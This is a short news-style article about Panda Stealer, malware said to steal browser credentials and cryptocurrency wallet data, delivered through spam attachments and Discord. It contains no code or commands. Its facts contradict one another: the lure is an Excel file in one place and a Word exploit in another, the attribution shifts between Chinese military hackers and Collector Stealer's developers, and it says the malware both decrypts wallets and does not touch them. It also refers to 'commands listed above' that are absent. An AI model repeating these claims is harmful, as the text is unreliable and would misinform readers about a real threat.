Credential-stealing malware that targets digital currency wallets has been discovered spreading through malicious spam emails and Discord channels. Panda Stealer, named after the hacking group that allegedly created it, appeared in late February and steals login credentials from victims’ Web browsers. It also decrypts Bitcoin wallet files stored on the victim’s computer to steal cryptocurrencies like bitcoin, ethereum and litecoin.
Panda Stealer is one of the first pieces of malware believed to be tied to Chinese military hackers. Panda’s most recent targets have been companies that primarily build software for iPhone and Mac computers, suggesting that the spambot might itself be used for future attacks on iPhones and Macs. The malware has mostly targeted victims in the U.S., Germany, Japan and Australia.
Trend Micro was the first ever security company that detected the malware. During a recent blog post, the Tokyo-based firm revealed that Panda Stealer is delivered through spam emails posing as business quotes to lure unsuspecting victims into opening malicious excel files.
The malware has two infection chains, the security company revealed. The PandaStealer malware family is an additional threat that uses a recent vulnerability in Microsoft Word to implant the malicious code and steal information. It is delivered via email as a. DOC file attachment that, when opened, exploits the flaw to drop various files within the user’s folder. One of these files is an executable containing most malicious functionality, and it runs every time Word starts. The commands listed above don’t seem to be of any malicious nature. Most likely the drops were simply meant to render a deep (in-memory) infection invisible to traditional analysis tactics. The only link that seems out of place is the Pastebin command that calls upon Paste#ee (“Paste + eee”), which reaches out and accesses yet another PowerShell command.
“Once installed, Panda Stealer can collect details like private keys and records of past transactions from its victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum,” Trend Micro company said. The malware does not connect to digital currency wallets, however. It steals credentials from other applications such as Steam, Telegram, and other similliar applications.
Researchers show that Panda Stealer Malware is linked to a VPS Provider Shock Hosting. However, the hosting company claimed that the server it had linked to this address has since been suspended.
Trend Micro found the malware by “the same people who developed and sold Collector Stealer.” They stated, “Cybercriminal groups and script kiddies alike can use it to create their own customized version of the stealer and C2 panel. Threat actors may also augment their malware campaigns with specific features from Collector Stealer.”